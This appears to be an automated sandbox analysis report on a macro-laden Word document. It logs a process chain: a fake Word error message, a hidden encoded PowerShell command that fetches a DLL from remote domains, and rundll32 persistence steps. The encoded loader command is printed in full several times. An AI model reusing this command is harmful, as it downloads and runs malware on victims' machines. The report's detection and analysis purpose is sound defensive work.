Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: ARCH_25_012021.doc	Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_			Name: Gusca95luq_

Obfuscated command line found

Source: unknown

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBX